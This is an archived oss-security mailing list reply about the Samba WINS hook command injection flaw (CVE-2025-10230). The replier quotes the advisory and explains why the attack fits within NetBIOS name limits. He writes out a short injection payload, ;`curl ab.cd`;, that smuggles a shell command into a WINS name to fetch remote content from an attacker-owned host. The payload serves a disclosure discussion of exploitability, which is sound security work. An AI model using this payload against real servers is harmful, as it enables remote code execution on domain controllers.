Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID:
 <DS1PR04MB965568BE9229892AA593E6E8C0E8A@DS1PR04MB9655.namprd04.prod.outlook.com>
Date: Wed, 15 Oct 2025 23:30:49 +0000
From: "Caveney, Seamus G" <sgcaveney@...ttleschools.org>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: RE: Samba security releases for CVE-2025-10230 and
 CVE-2025-9640

-----Original Message-----
From: Douglas Bagnall <douglas.bagnall@...alyst.net.nz> 
Sent: Wednesday, October 15, 2025 11:51 AM
To: oss-security@...ts.openwall.com
Subject: [oss-security] Samba security releases for CVE-2025-10230 and CVE-2025-9640

> [snip]

> If a Samba server has WINS support enabled (it is off by default), and it has a 'wins hook' parameter specified, the
> program specified by that parameter will be run whenever a WINS name is changed.
> The WINS server used by the Samba Active Directory Domain Controller did not validate the names passed to the wins
> hook program, and it passed them by inserting them into a string run by a shell.
> WINS is an obsolete and trusting protocol, and clients can request any name that fits within the 15 character NetBIOS
> limit. This includes some shell metacharacters, making it possible to run arbitrary commands on the host.
> The WINS server used by Samba when it is not a domain controller is unaffected.

Illegal characters in a NetBIOS hostname are:

\ / : * ? " < > | ,

notably excluding backticks and semicolons. I'm not deeply familiar with the Samba code base but a glance at nbtname.c
and winsserver.c seems to suggest that those character limitations aren't enforced at the protocol level, so it might be
possible to use pipes, redirects or exec a local binary with a short path. Otherwise, the easiest exploitable payload I
can think of would be:

;`curl ab.cd`;

which fits the restrictions at only 14 characters (replace with your favourite short-named download tool that writes to
STDOUT by default - looks like RHEL-likes are one of the few distros still shipping /usr/bin/GET as part of perl LWP).
Requiring an attacker to own a 2-3 letter domain on a 2-3 letter TLD limits the attack surface quite a bit but it isn't
unheard of. I'd be interested to see if anybody has a living Samba install configured as a DC with WINS still running in
2025.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.